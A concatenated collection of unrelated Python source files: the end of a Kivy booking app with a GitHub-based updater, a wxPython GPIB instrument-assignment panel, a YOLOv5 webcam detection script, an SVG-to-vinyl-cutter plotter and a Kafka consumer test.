btn.on_release = partial(myprint,s3,btn)
if farbe:
btn.background_color=(1,0,1,1)
else:
btn.background_color=(0,1,1,1)
farbe = not farbe
self.root.liste.add_widget(btn)
def langeListe(self):
layout = GridLayout(cols=1, padding=10, spacing=10,
size_hint=(None, None), width=180)
layout.bind(minimum_height=layout.setter('height'))
buli=self.holeBuchungen()
for t in sorted(buli):
print "##",t
neuerTag=True
if int(t) <self.heute:
continue
neueStunde=True
for s in sorted(buli[t]):
print "--",s
if len(buli[t][s]):
neueStunde= not neueStunde
print neueStunde
for g in sorted(buli[t][s]):
print [t,s,g,buli[t][s][g]]
nick=buli[t][s][g][0][0:2]
tt=self.doyString2(t)
ytext= " ".join([s,g,buli[t][s][g][0][0:2]])
btn = Button(text=ytext, size=(280, 40),
size_hint=(None, None))
if neueStunde:
btn.background_color=(1,0,1,1)
else:
btn.background_color=(0,1,1,1)
if neuerTag:
wotagint=1
wotagint=self.doy2dow(t)
ytext2=wotagstring(wotagint) + ", " + tt # " ".join([tt,s,g,buli[t][s][g][0][0:2]])
btn2 = Button(text=ytext2, size=(280, 40),
size_hint=(None, None))
btn2.background_color=(0,0,1,1)
layout.add_widget(btn2)
neuerTag=False
layout.add_widget(btn)
pass
root2 = ScrollView(size_hint=(None, None), size=(300, 590),
pos_hint={'center_x': .5, 'center_y': .5}, do_scroll_x=False)
root2.add_widget(layout)
root3=BoxLayout(orientation='vertical')
b=Button(text="f1 (nofunc)")
root3.add_widget(b)
b=Button(text="Buchen",on_release=self.sayhello)
root3.add_widget(b)
b=Button(text="Start", on_release=self.gomain)
root3.add_widget(b)
root=BoxLayout( orientation='horizontal')
root.add_widget(root3)
root.add_widget(root2)
self.root.remove_widget(self.ao)
try:
self.root.remove_widget(self.bl)
except:
pass
self.root.add_widget(root)
def gomain(self,a):
self.root.remove_widget(self.root.children[0])
try:
self.root.remove_widget(self.bl)
except:
pass
self.root.add_widget(self.ao)
def gobl(self,a):
self.root.remove_widget(self.root.children[0])
self.root.add_widget(self.bl)
def doyString(self,doy):
ss=(datetime.datetime.now() + datetime.timedelta(days=int(doy))).strftime("%d.%m.")
return ss
def doyString2(self,doy):
day_of_year = datetime.datetime.now().timetuple().tm_yday
ss=(datetime.datetime.now() + datetime.timedelta(days=int(doy)-day_of_year)).strftime("%d.%m.")
return ss
def doy2dow(self,doy):
day_of_year = datetime.datetime.now().timetuple().tm_yday
ss=(datetime.datetime.now() + datetime.timedelta(days=int(doy)-day_of_year)).weekday()
return ss
def configure(self,but):
print "configure writer file ..."
f = open('myfile','w')
#print but.parent.children[1]
#print but.parent.children[1].children
l=len(but.parent.children) -4
for i in but.parent.children:
print i
print "huhu"
print l
self.passw=but.parent.children[l].children[0].text
self.user=but.parent.children[l].children[1].text
self.name=but.parent.children[l].children[2].text
f.write(self.user + ':1234:'+ self.name+'\n') # python will convert \n to os.linesep
f.close() # you can omit in most cases as the destructor will call it
try:
self.addon.add_widget(self.bucher)
except:
pass
self.readconfig(but)
def readversion(self):
l2='title=xy:9876:Ix Ypslein'
try:
f = open("android.txt")
lines = f.readlines()
for l in lines:
l2=l.split('=')
print l2
if l2[0]=='title':
f.close()
return l2[1].strip()
except:
return "??"
def readconfig(self,but):
l2='xy:9876:Ix Ypslein'
try:
f = open("myfile")
lines = f.readlines()
for l in lines:
l2=l.strip()
f.close()
except:
l2='xy:9876:Ix Ypslein'
[self.user,self.passw,self.name]=l2.split(':')
import hashlib
self.md5=hashlib.md5(self.passw).hexdigest()
import random
self.hash=random.randint(1000,9999)
self.md5hash=hashlib.md5(str(self.hash)).hexdigest()
print (self.user, self.passw,self.md5,self.hash,self.md5hash)
try:
print but
but.text='angemeldet als ' + '-'.join([self.user, self.passw,self.md5,str(self.hash),self.md5hash])
except:
pass
print "done"
return [self.user, self.name, self.passw,self.md5,str(self.hash),self.md5hash]
def on_start(self):
global superbl
global vers
if not self.ao:
self.ao=addon()
self.bl=self.root.kite
superbl=self.root.kite
self.root.remove_widget(self.root.kite)
self.root.add_widget(self.ao)
ll=self.readconfig(None)
self.ao.name.text=ll[0]
self.ao.namelong.text=ll[1]
self.bucher=self.ao.bucher
self.addon=self.ao.addon
self.addon.remove_widget(self.bucher)
print superbl
else:
self.root.remove_widget(self.ao)
self.root.add_widget(self.bl)
self.ao=False
#self.personen=self.holePersonen()
self.geraete=self.holeStunden()
self.geraete=self.holeGeraete()
self.holeTage()
self.root.liste.clear_widgets()
# testuser
self.user=self.ao.name.text
day_of_year = datetime.datetime.now().timetuple().tm_yday
self.heute=day_of_year
if sap.updater():
global update
print "update yes/no ..."
btn = Button(
text='Update Software required', font_size=14,
on_release = self.process_button_click
)
self.addon.add_widget(btn)
print self.addon.children[0]
# Titel setzen
self.addon.children[5].text='[color=#ffff00][size=50][b]Snow Kite School V '+vers +'[/b][/size][/color]'
print "----------------"
title=self.readversion()
print "title:"+title
self.addon.children[5].text='[color=#ffff00][size=50][b]' + title + '[/b][/size][/color]'
def post_build_init(self, *args):
# Map Android keys
if platform == 'android':
android.map_key(android.KEYCODE_BACK, 1000)
android.map_key(android.KEYCODE_MENU, 1001)
win = self._app_window
win.bind(on_keyboard=self._key_handler)
def _key_handler(self, *args):
key = args[1]
print "key handler"
print key
try:
# Escape or Android's back key
#self.root.lab.text="EXIT key=" + str(key)
if key in (1000, 27):
self.hide_kbd_or_exit()
return True
except:
return False
def reset_exitnext(self,t):
self.exitnext=False
def hide_kbd_or_exit(self, *args):
if not self.exitnext:
self.exitnext = True
#kurz warten auf double exit
Clock.schedule_once(self.reset_exitnext,0.5)
self.gomain(None)
else:
self.stop()
def updater(self):
return True
# hack
import re
source="https://github.com/microelly2/kivy-ressourcen/archive/master.zip"
print(source)
plugin="microelly2/kivy-ressourcen"
fn='https://api.github.com/repos/microelly2/kivy-ressourcen/commits'
gitdate='no date from git'
try:
fn='https://api.github.com/repos/' + plugin + '/commits'
import urllib,json
data=urllib.urlopen(fn).read()
print data
d = json.loads(data)
dit=d[0]
gitdate=dit['commit']['committer']['date']
print (gitdate)
installdate="2015-10-21T15:02:35Z"
print (installdate)
except:
return True
upd=False
if installdate >gitdate:
mess="--- package " + plugin + " is up to date ---"
else:
mess="!!! update for " + plugin + " recommented !!!"
upd=True
print mess
return upd
####################
def show_popup(self):
#self.pop_up = Factory.PopupBox()
self.pop_up = PopupBox()
self.pop_up.update_pop_up_text('Running some task...')
self.pop_up.open()
def process_button_click(self,dummy):
self.show_popup()
# self.source=source
mythread1 = threading.Thread(target=self.something_that_takes_5_seconds_to_run)
mythread = threading.Thread(target=self.readZip)
mythread1.start()
mythread.start()
def something_that_takes_5_seconds_to_run(self):
thistime = time.time()
while thistime + 5 > time.time(): # 5 seconds
self.pop_up.update_pop_up_text('running ' + '*' * int(time.time()-thistime))
time.sleep(1)
def readZip(self,but=None):
source='https://github.com/microelly2/kivy-ressourcen/archive/master.zip'
self.pop_up.update_pop_up_text('get git ' + source + ' ...')
try:
response = urllib2.urlopen(source)
zipcontent= response.read()
with open("my.zip", 'w') as f:
f.write(zipcontent)
f.close()
except:
self.pop_up.update_pop_up_text('error getting the git')
return
self.pop_up.update_pop_up_text('unzip ...')
print "download"
try:
unzip("my.zip","..")
except:
self.pop_up.update_pop_up_text('error unzip')
return
self.pop_up.dismiss()
####################
if __name__ == '__main__' and True:
sap=kiteApp()
sap.updater()
sap.run()
|
panelIntroV1.py
|
import wx # Library used for the interface components
import visa # Library for device interfacing. In this case, GPIB access
import saveSession
from threading import Thread
from Instruments import instrument_names
import os
from wx.lib.pubsub import pub
import tkinter
from tkinter import filedialog
ID_DEVICE_FOUND = wx.NewId()
ID_DEVICE_NOT_FOUND = wx.NewId()
def getDeviceInfo(rm, address):
entry = ''
device = {}
try:
inst = rm.open_resource(address)
try:
nameInst = inst.query("*IDN?")
# remove newlines
nameInst = nameInst.replace('\n', ' ')
entry = f"Model: {nameInst} Address: {address}"
device = {"idn": nameInst, "address": address}
inst.close()
except Exception as e:
print(e)
inst.close()
except Exception as e:
print(e)
wx.MessageDialog(None, f"Could not open device at address {address}").ShowModal()
return entry, device
class btnIntroPanel(wx.Panel):
def __init__(self, parent, devNameList):
wx.Panel.__init__(self,parent)
btnWidth = 150
btnHeight = 40
self.button = []
button_sizer = wx.BoxSizer(wx.VERTICAL)
for i in range(len(devNameList)):
self.button.append(wx.Button(self, label = devNameList[i], size = (btnWidth, btnHeight)))
button_sizer.Add(self.button[i], 0, wx.ALL, 1)
button_sizer.Add(wx.StaticLine(self), 0, wx.ALL, 1)
#==============================================================================================================================================================
# Every interface requires flavour text that allows the user to use it more easily. These flavour texts can come as
# "input/output" text slots or "labels"
self.txtAssignResult = wx.TextCtrl(self, size = ( 390, 60), style = wx.TE_MULTILINE)
button_sizer.Add(self.txtAssignResult, 0, wx.ALL, 5)
button_sizer.Add(wx.StaticLine(self), 0, wx.ALL|wx.EXPAND, 5)
self.buttonClear = wx.Button(self, label = "& Clear Assignments", size = (200,60))
self.buttonDone = wx.Button(self, label = "& Done!", size = (200,60))
horizSizerClearDone = wx.BoxSizer(wx.HORIZONTAL)
horizSizerClearDone.Add(self.buttonDone, 0, wx.ALL, 0)
horizSizerClearDone.Add(self.buttonClear, 0, wx.ALL, 0)
button_sizer.Add(horizSizerClearDone, 0, wx.ALL, 5)
button_sizer.Add(wx.StaticLine(self), 0, wx.ALL|wx.EXPAND, 5)
#==============================================================================================================================================================
# create a normal bitmap button
bmpSave = wx.Bitmap("saveIcon.png", wx.BITMAP_TYPE_ANY)
bmpOpen = wx.Bitmap("openIcon.png", wx.BITMAP_TYPE_ANY)
bmpRefr = wx.Bitmap("refrIcon.png", wx.BITMAP_TYPE_ANY)
self.bmapBtnSave = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmpSave, size=(bmpSave.GetWidth()+10, bmpSave.GetHeight()+10))
self.bmapBtnOpen = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmpOpen, size=(bmpSave.GetWidth()+10, bmpSave.GetHeight()+10))
self.bmapBtnRefr = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmpRefr, size=(bmpSave.GetWidth()+10, bmpSave.GetHeight()+10))
genHorizSizer = wx.BoxSizer(wx.HORIZONTAL)
genHorizSizer.Add(self.bmapBtnSave,0,wx.ALL,1)
genHorizSizer.Add(self.bmapBtnOpen,0,wx.ALL,1)
genHorizSizer.Add(self.bmapBtnRefr,0,wx.ALL,1)
# self.txtFileName = wx.TextCtrl(self, size = ( 390, 60))
button_sizer.Add(genHorizSizer, 0,wx.ALL,1)
# button_sizer.Add(self.txtFileName,0,wx.ALL,1)
# button_sizer.Add(wx.StaticLine(self), 0, wx.ALL | wx.EXPAND, 5)
# self.staticAssign = wx.StaticText(self, 1, "Macro Setup:", size=(150, 20))
# button_sizer.Add(self.staticAssign, 0, wx.CENTER, 0)
# bmpMacroOpen = wx.Bitmap("openIcon.png", wx.BITMAP_TYPE_ANY)
# bmpMacroRefr = wx.Bitmap("refrIcon.png", wx.BITMAP_TYPE_ANY)
# self.bmapMacroBtnOpen = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmpMacroOpen,
# size=(bmpMacroOpen.GetWidth() + 10, bmpMacroOpen.GetHeight() + 10))
# self.bmapMacroBtnRefr = wx.BitmapButton(self, id=wx.ID_ANY, bitmap=bmpMacroRefr,
# size=(bmpMacroOpen.GetWidth() + 10, bmpMacroOpen.GetHeight() + 10))
# genMacroHorizSizer = wx.BoxSizer(wx.HORIZONTAL)
# genMacroHorizSizer.Add(self.bmapMacroBtnOpen, 0, wx.ALL, 1)
# genMacroHorizSizer.Add(self.bmapMacroBtnRefr, 0, wx.ALL, 1)
# button_sizer.Add(genMacroHorizSizer)
self.SetSizerAndFit(button_sizer)
class listIntroPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self,parent)
list_sizer = wx.BoxSizer(wx.VERTICAL)
self.onlyFiles = []
self.foundDevices = {}
list_sizer.Add(wx.StaticLine(self), 0, wx.ALL|wx.EXPAND, 5)
self.staticDevices = wx.StaticText(self,1,"Devices Found:", size=(150,20))
list_sizer.Add(self.staticDevices, 0, wx.CENTER, 0)
self.listFiles = wx.ListBox(self, size = (400,400), choices = ["Looking for devices..."], style = wx.LB_SINGLE)
list_sizer.Add(self.listFiles, 0, wx.ALL, 5)
self.btnAddress = wx.Button(self, label = "Open by Address")
list_sizer.Add(self.btnAddress, 0, wx.CENTER | wx.EXPAND | wx.LEFT | wx.RIGHT, 100)
self.Bind(wx.EVT_BUTTON, self.loadAddress, self.btnAddress)
self.SetSizerAndFit(list_sizer)
self.rm = visa.ResourceManager()
t = Thread(target=self.findDevices)
t.start()
def findDevices(self):
for i in self.rm.list_resources():
entry, device = getDeviceInfo(self.rm, i)
if entry:
self.onlyFiles.append(entry)
self.foundDevices[entry] = device
self.listFiles.Insert(entry, self.listFiles.GetCount() - 1)
self.listFiles.Delete(self.listFiles.GetCount() - 1)
def loadAddress(self, event = None):
with customAddressPopup(self) as addrPop:
if addrPop.ShowModal() == wx.ID_OK:
address = addrPop.address.GetLineText(0)
entry, device = getDeviceInfo(self.rm, address)
if entry:
self.onlyFiles.append(entry)
self.foundDevices[entry] = device
self.listFiles.Insert(entry, self.listFiles.GetCount() - 1)
class assignIntroPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self,parent)
assign_sizer = wx.BoxSizer(wx.VERTICAL)
self.assignedDevices = {}
assign_sizer.Add(wx.StaticLine(self), 0, wx.ALL|wx.EXPAND, 5)
self.staticAssign = wx.StaticText(self,1,"Assignments:", size=(150,20))
assign_sizer.Add(self.staticAssign, 0, wx.CENTER, 0)
self.listAssignment = wx.ListBox(self, size = (400,400), choices = [], style = wx.LB_SINGLE)
assign_sizer.Add(self.listAssignment, 0, wx.ALL, 5)
self.SetSizerAndFit(assign_sizer)
class missingDevicePopup(wx.Dialog):
def __init__(self, parent, error, availableDevices):
wx.Dialog.__init__(self, parent)
self.Centre(direction = wx.HORIZONTAL)
self.errorMes = wx.StaticText(self, 1, "{0}\nPlease select a corresponding device from the list below\nIf you can't see it check to ensure that it's correctly connected".format(error))
self.listHeader = wx.StaticText(self, 1, "Available devices")
self.listFiles = wx.ListBox(self, size = (400,400), choices = availableDevices, style = wx.LB_SINGLE)
self.buttonDone = wx.Button(self, id = ID_DEVICE_FOUND, label = "Done")
self.buttonNotDone = wx.Button(self, id = ID_DEVICE_NOT_FOUND, label = "I don't see it")
self.Bind(wx.EVT_BUTTON, self.not_found, self.buttonNotDone)
self.SetAffirmativeId(ID_DEVICE_FOUND)
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(self.errorMes, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.listHeader, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.listFiles, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.buttonDone, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.buttonNotDone, 0, wx.ALL|wx.EXPAND, 5)
self.SetSizerAndFit(main_sizer)
def not_found(self, event):
self.EndModal(ID_DEVICE_NOT_FOUND)
class customAddressPopup(wx.Dialog):
def __init__(self, parent):
wx.Dialog.__init__(self, parent)
self.Centre()
self.listHeader = wx.StaticText(self, 1, "Device Address: ")
self.address = wx.TextCtrl(self, size = (400,20))
self.buttonDone = wx.Button(self, id = wx.ID_OK, label = "Done")
self.buttonNotDone = wx.Button(self, id = wx.ID_CANCEL, label = "No thanks")
self.Bind(wx.EVT_BUTTON, self.onDone, self.buttonDone)
main_sizer = wx.BoxSizer(wx.VERTICAL)
main_sizer.Add(self.listHeader, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.address, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.buttonDone, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.buttonNotDone, 0, wx.ALL|wx.EXPAND, 5)
self.SetSizerAndFit(main_sizer)
def onDone(self, event):
if self.address.GetLineLength(0) == 0:
wx.MessageDialog(self, 'Please input an address or press "No thanks"').ShowModal()
else:
self.EndModal(wx.ID_OK)
class mainIntroPanel(wx.Panel):
def __init__(self, parent):
wx.Panel.__init__(self,parent)
self.openedResList = []
self.devInfoList = []
self.devNameList = []
self.macros = []
self.devNameListInit = instrument_names()
self.btnPanel = btnIntroPanel(self, self.devNameListInit)
self.listPanel = listIntroPanel(self)
self.assignPanel = assignIntroPanel(self)
self.configPath = os.path.abspath("Config Files")
self.macroPath = os.path.abspath("macros")
self.autosaveFile = os.path.join(self.macroPath, 'lastsession.ses')
self.macros = []
# ==============================================================================================================
# Binding buttons to their respective functions is extremely important. Once again, even though the names are
# arbitrary, it is good practice to name buttons and functions with similar names if they are to be bound together.
for i in range(len(self.btnPanel.button)):
self.Bind(wx.EVT_BUTTON, self.onDevBtn, self.btnPanel.button[i])
self.Bind(wx.EVT_BUTTON, self.onDone, self.btnPanel.buttonDone)
self.Bind(wx.EVT_BUTTON, self.onClear, self.btnPanel.buttonClear)
self.Bind(wx.EVT_BUTTON, self.onSave, self.btnPanel.bmapBtnSave)
self.Bind(wx.EVT_BUTTON, self.onOpen, self.btnPanel.bmapBtnOpen)
self.Bind(wx.EVT_BUTTON, self.onRefr, self.btnPanel.bmapBtnRefr)
# self.Bind(wx.EVT_BUTTON, self.onOpenMacro, self.btnPanel.bmapMacroBtnOpen)
# self.Bind(wx.EVT_BUTTON, self.onRefrMacro, self.btnPanel.bmapMacroBtnRefr)
# ==============================================================================================================
main_sizer = wx.BoxSizer(wx.HORIZONTAL)
main_sizer.Add(self.btnPanel, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.listPanel, 0, wx.ALL|wx.EXPAND, 5)
main_sizer.Add(self.assignPanel, 0, wx.ALL|wx.EXPAND, 5)
self.SetSizerAndFit(main_sizer)
def onDevBtn(self, event):
label = event.GetEventObject().GetLabel()
selec = self.listPanel.listFiles.GetSelection()
if selec < 0:
stringResult = "Please select a device from the panel on the right before assigning a name"
self.btnPanel.txtAssignResult.SetValue(stringResult)
stringName = self.listPanel.listFiles.GetString(selec)
device = self.listPanel.foundDevices.get(stringName, False)
if device == False:
raise Exception(f"Device {stringName} not found in listPanel.foundDevices, this should be impossible")
self.devInfoList.append(device)
self.devNameList.append(label)
stringResult = f"Device with IDN {device['idn']} assigned to a {label} Unit"
self.btnPanel.txtAssignResult.SetValue(stringResult)
self.listPanel.listFiles.Delete(selec)
del self.listPanel.foundDevices[stringName]
self.assignPanel.assignedDevices[stringName] = device
devIndex = self.devNameList.index(label)
stringAssign = "{0} {1} --> {2}".format(label, devIndex, stringName)
self.assignPanel.listAssignment.InsertItems([stringAssign], 0)
def onDone(self, event):
mixedList = [self.devInfoList, self.devNameList]
self.openedResList = []
for i in self.devInfoList:
self.openedResList.append(self.listPanel.rm.open_resource(i["address"]))
mixedList.append(self.openedResList)
# Write the autosave file
saveSession.saveSession(self.devInfoList, self.devNameList, self.macros, filename = self.autosaveFile)
pub.sendMessage('RecorderLoad', msg = (self.devInfoList, self.devNameList, self.macros))
pub.sendMessage('AssigningDone', msg = mixedList)
pub.sendMessage('MacroOpen', msg={"macros": self.macros, "devInfo": self.devInfoList, "devName": self.devNameList})
def onClear(self, event):
a = self.listPanel.listFiles.GetCount()
b = self.assignPanel.listAssignment.GetCount()
for i in range(a):
self.listPanel.listFiles.Delete(0)
for i in range(b):
self.assignPanel.listAssignment.Delete(0)
self.listPanel.foundDevices = {}
self.listPanel.foundDevices = self.assignPanel.assignedDevices
self.assignPanel.assignedDevices = {}
self.devInfoList = []
self.devNameList = []
try:
self.listPanel.listFiles.InsertItems(self.listPanel.onlyFiles, 0)
except:
print("No Devices Connected.")
stringResult = "All assignments cleared"
self.btnPanel.txtAssignResult.SetValue(stringResult)
pub.sendMessage('AssignCleared', msg=[])
def onSave(self, event):
# UserName = self.btnPanel.txtFileName.GetValue()
saveSession.saveSession(self.devInfoList, self.devNameList)
def loadPrevious(self):
found = False
newInfoList = []
newNameList = []
for devInfo, devName in zip(self.devInfoList, self.devNameList):
found = False
count = 0
for panelName, device in self.listPanel.foundDevices.items():
if devInfo["idn"] == device["idn"]:
found = True
self.listPanel.listFiles.Delete(count)
del self.listPanel.foundDevices[panelName]
self.assignPanel.assignedDevices[panelName] = device
devIndex = self.devNameList.index(devName)
stringAssign = "{0} {1} --> {2}".format(devName, devIndex, panelName)
self.assignPanel.listAssignment.InsertItems([stringAssign], 0)
newInfoList.append(device)
newNameList.append(devName)
break # Not necessary but we might as well quit early
count += 1
if not found:
errorMes = f"Could not find {devName}\nIDN: {devInfo['idn']}\nAddress: {devInfo['address']}"
bail = False
with missingDevicePopup(self, errorMes, self.listPanel.listFiles.GetItems()) as pop:
returnId = pop.ShowModal()
if returnId == ID_DEVICE_FOUND: # Great, Add the device
selec = pop.listFiles.GetSelection()
if selec < 0:
bail = True
stringName = pop.listFiles.GetString(selec)
device = self.listPanel.foundDevices.get(stringName, False)
if device == False:
raise Exception(f"Device {stringName} not found in listPanel.foundDevices, this should be impossible")
self.listPanel.listFiles.Delete(selec)
del self.listPanel.foundDevices[stringName]
self.assignPanel.assignedDevices[stringName] = device
devIndex = self.devNameList.index(devName)
stringAssign = "{0} {1} --> {2}".format(devName, devIndex, stringName)
self.assignPanel.listAssignment.InsertItems([stringAssign], 0)
newInfoList.append(device)
newNameList.append(devName)
elif returnId == ID_DEVICE_NOT_FOUND: # Let's give a custom address
with customAddressPopup(self) as addrPop:
if addrPop.ShowModal() == wx.ID_OK:
address = addrPop.address.GetLineText(0)
entry, device = getDeviceInfo(self.listPanel.rm, address)
stringAssign = "{0} {1} --> {2}".format(devName, 0, entry)
self.assignPanel.listAssignment.InsertItems([stringAssign], 0)
newInfoList.append(device)
newNameList.append(devName)
else: # User doesn't have an address, bail early
bail = True
else: # Bail early
bail = True
if bail: # User wants to skip this device
print("Skipping!")
self.devInfoList = newInfoList
self.devNameList = newNameList
stringResult = "Finished loading previous assignment"
self.btnPanel.txtAssignResult.SetValue(stringResult)
def onOpen(self, event):
tkinter.Tk().withdraw() # Close the root window
self.devInfoList, self.devNameList, self.macros = saveSession.loadSession()
self.loadPrevious()
self.onDone(event)
def onRefr(self, event):
self.devInfoList, self.devNameList, self.macros = saveSession.loadSession(filename = self.autosaveFile)
self.loadPrevious()
mixedList = [self.devInfoList, self.devNameList]
for i in self.devInfoList:
self.openedResList.append(self.listPanel.rm.open_resource(i["address"]))
mixedList.append(self.openedResList)
pub.sendMessage('RecorderLoad', msg = (self.devInfoList, self.devNameList, self.macros))
pub.sendMessage('AssigningDone', msg = mixedList)
pub.sendMessage('MacroOpen', msg={"macros": self.macros, "devInfo": self.devInfoList, "devName": self.devNameList})
def onOpenMacro(self, event):
self.onOpen(event)
pub.sendMessage('MacroOpen', msg={"macros": self.macros})
def onRefrMacro(self, event):
self.onRefr(event)
pub.sendMessage('MacroOpen', msg={"macros": self.macros, "devInfo": self.devInfoList, "devName": self.devNameList})
|
cam_video.py
|
# cam_video.py
import cv2
import time
import numpy as np
import torch
import threading
torch.device('cpu')
# global variable to exit the run by pressing some user specific keystroke
exit = 0
def analyze_cv_single_picture():
global exit
try:
model = torch.hub.load('ultralytics/yolov5', 'yolov5s', pretrained=True)
cap = cv2.VideoCapture(0)
i = 0
target_x = 0
target_y = 0
print(f'target is : {target}')
while not exit and i<4:
i += 1
start = time.time()
ret, frame = cap.read()
if not ret:
print('Could not read frame.')
break
# imgs = ['https://ultralytics.com/images/zidane.jpg'] # batch of images
# Inference
results = model(frame)
# Results
#results.print()
#results.save() # or .show()
#results.show()
#results.xyxy[0]
cv2.imshow('result', np.asarray(results.imgs[0], dtype=np.uint8))
print(f'results.pandas().xyxy[0]:\n{results.pandas().xyxy[0]}') # img1 predictions (pandas)
# xmin ymin xmax ymax confidence class name
# 0 749.50 43.50 1148.0 704.5 0.874023 0 person
# 1 433.50 433.50 517.5 714.5 0.687988 27 tie
# 2 114.75 195.75 1095.0 708.0 0.624512 0 person
# 3 986.00 304.00 1028.0 420.0 0.286865 27 tie
results_df = results.pandas().xyxy[0]
target_df = results_df[results_df['name'].isin([target])] # filter on spesific values
if target_df.size > 0:
print(f'target_df.size is {target_df.size}')
x = target_df["xmin"].values[0]
y = target_df["ymin"].values[0]
print(f'found {target} in x={x} and y={y}')
if target_x!=0 and target_y!=0:
if target_x>x:
print('target moved left')
else:
print('target moved right')
target_x = x
target_y = y
stop = time.time()
seconds = stop - start
print(f'Time taken : {seconds} seconds')
# Calcutate frames per seconds
fps = 1 / seconds
print(f'Estimated frames per second : {fps}')
key = cv2.waitKey(0) & 0xFF
if key == ord('q'):
print('Quitting.')
break
finally:
cap.release()
#cv2.destroyAllWindows()
print('Detections have been performed successfully.')
def get_user_input():
global exit
keystrk = input('Press a key to exit.\n')
# thread dosen't continue until key is pressed
print('done')
exit = 1
if __name__ == '__main__':
target = 'person'
analyze_cv_single_picture()
#analyze = threading.Thread(target=analyze_cv_single_picture)
#user_input = threading.Thread(target=get_user_input)
#analyze.start()
#user_input.start()
#analyze.join()
#user_input.join()
|
printsvg.py
|
#!/usr/bin/env python
import argparse
import math
import sys
from multiprocessing import Process, Queue
from xml.dom import minidom
import kdtree
import shapely.ops
import svg.path
from shapely.geometry import LineString
from graph import *
try:
import silhouette
units = silhouette.units
except ImportError:
sys.stderr.write("Warning: no silhouette module available\n")
sys.exit(1)
units.define("pixel = inch / 72 = px")
def to_steps(thing):
if type(thing) in (tuple, list) and len(thing) == 2 and type(thing[0]) in (int, float):
(x, y) = thing
x *= units["pixel"]
y *= units["pixel"]
# flip x
x = (12 * units["inch"]) - x
x = x.to("steps").magnitude
y = y.to("steps").magnitude
return x, y
return map(to_steps, thing)
def draw_rect(cutter, **kw):
x = float(kw["x"])
y = float(kw["y"])
width = float(kw["width"])
height = float(kw["height"])
move = (x, y)
draw = [(x + width, y), (x + width, y + height), (x, y + height), (x, y)]
cutter.position = to_steps(move)
cutter.draw(to_steps(draw))
def walk_graph(graph, node):
stack = [node]
reverse = []
path = [node]
while stack:
node = stack[-1]
children = [nnode for nnode in graph[node] if not graph[node][nnode]["visited"]]
if children:
child = children[0]
graph[node][child]["visited"] = True
if reverse:
path += reverse
reverse = []
path.append(child)
stack.append(child)
continue
# no children
stack.pop()
if stack:
reverse.append(stack[-1])
return path
def build_path_commands(tree, graph):
cursor = (0, 0)
next_node = tree.search_nn(cursor)
nodes = []
culled = set()
while next_node:
(next_point, distance) = next_node
next_point = next_point.data
distance = math.sqrt(distance)
tree = tree.remove(next_point)
culled.add(next_point)
if nodes and distance > 16:
yield nodes
nodes = []
nodes += walk_graph(graph, next_point)
for node in nodes:
if node in culled:
continue
tree = tree.remove(node) or tree
culled.add(node)
next_node = tree.search_nn(nodes[-1])
if nodes:
yield nodes
def graph_lines(lines):
graph = BidirectedGraph()
if isinstance(lines, LineString):
lines = [lines]
for line in lines:
last_coord = None
for coord in line.coords:
if coord not in graph:
graph.add_node(coord)
if last_coord:
val = {"visited": False}
graph.connect(coord, last_coord, val)
last_coord = coord
return graph
def simplify_path(path):
lines = svg.path.parse_path(path)
coords = [lines[0].start]
for line in lines:
if type(line) != svg.path.Line:
raise NameError('The SVG file contains a path with crap: {}.'.format(type(line)))
coords.append(line.end)
coords = [(c.real, c.imag) for c in coords]
lines = to_steps(coords)
lines = [list(lines)]
result = shapely.ops.linemerge(lines)
print("building graph")
graph = graph_lines(result)
print("building kdtree")
tree = kdtree.create(list(graph.keys()))
return build_path_commands(tree, graph)
def produce_paths(svgfn, path_queue):
fh = open(svgfn)
doc = minidom.parse(fh)
paths = doc.getElementsByTagName("path")
for path in paths:
points = path.getAttribute('d')
subpaths = simplify_path(points)
for subpath in subpaths:
path_queue.put(subpath)
rects = doc.getElementsByTagName("rect")
for rect in rects:
path_queue.put(dict(rect.attributes.items()))
path_queue.put("done")
def draw_svg(worker, path_queue, connect_kws=None):
if connect_kws is None: connect_kws = {}
cutter = connect(**connect_kws)
try:
while 1:
thing = path_queue.get()
if thing == "done":
break
if type(thing) == dict:
for rpt in range(3):
draw_rect(cutter, **thing)
else:
cutter.position = thing[0]
cutter.draw(thing)
worker.join()
finally:
cutter.home()
def connect(**kw):
cutter = silhouette.Silhouette(**kw)
cutter.connect()
print("speed")
cutter.speed = 8
print("pressure")
cutter.pressure = 4
print("media")
cutter.media = 113
print("offset")
cutter.offset = 0
return cutter
if __name__ == "__main__":
path_queue = Queue()
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--output-file',
help='Save commands to a file instead of sending to the cutter')
parser.add_argument('svg_img', metavar='SVG_IMG', help='Filename of the SVG image to be cut')
args = parser.parse_args()
worker = Process(target=produce_paths, args=(args.svg_img, path_queue))
worker.start()
if args.output_file:
with open(args.output_file, 'wb') as of:
draw_svg(worker, path_queue, connect_kws={'output_file': of})
else:
draw_svg(worker, path_queue)
|
test_consumer_group.py
|
import collections
import logging
import threading
import time
import pytest
from kafka.vendor import six
from kafka.conn import ConnectionStates
from kafka.consumer.group import KafkaConsumer
from kafka.coordinator.base import MemberState
from kafka.structs import TopicPartition
from test.testutil import env_kafka_version, random_string
def get_connect_str(kafka_broker):
return kafka_broker.host + ':' + str(kafka_broker.port)
@pytest.mark.skipif(not env_kafka_version(), reason="No KAFKA_VERSION set")
def test_consumer(kafka_broker, topic):
# The `topic` fixture is included because
# 0.8.2 brokers need a topic to function well
consumer = KafkaConsumer(bootstrap_servers=get_connect_str(kafka_broker))
consumer.poll(500)
assert len(consumer._client._conns) > 0
node_id = list(consumer._client._conns.keys())[0]
assert consumer._client._conns[node_id].state is ConnectionStates.CONNECTED
consumer.close()
